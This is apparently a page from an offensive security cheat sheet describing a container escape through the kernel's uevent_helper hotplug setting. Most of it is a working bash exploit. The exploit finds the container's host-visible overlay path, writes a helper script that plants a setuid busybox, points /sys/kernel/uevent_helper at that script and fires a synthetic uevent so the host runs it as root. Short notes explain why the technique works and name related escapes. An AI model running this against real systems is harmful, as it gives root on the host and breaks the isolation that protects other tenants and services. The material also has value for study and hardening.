uevent_helper

/sys/kernel/uevent_helper is the legacy hotplug helper: a program the kernel forks, as root in the host context, on each device uevent. With a writable host /sys (privileged container or CAP_SYS_ADMIN), overwrite it with a host-visible helper and fire a synthetic uevent to run code on the host.

bash
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /proc/self/mountinfo | head -1)

cat > /x <<'SH'
#!/bin/sh
cp /bin/busybox /host_marker && chmod +s /host_marker
SH
chmod +x /x

echo "$host_path/x" > /sys/kernel/uevent_helper
# Trigger a uevent on any device
echo change > /sys/class/mem/null/uevent

Exploitation notes#

  • uevent_helper is empty by default on modern systems (udev uses a netlink socket instead), so setting it at all is the attack; the kernel still honors it when non-empty.
  • Writing any device's uevent file with an action keyword (add, change) generates the event that invokes the helper.
  • A sibling of core_pattern and modprobe path: same gate, same host-visible-path trick.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more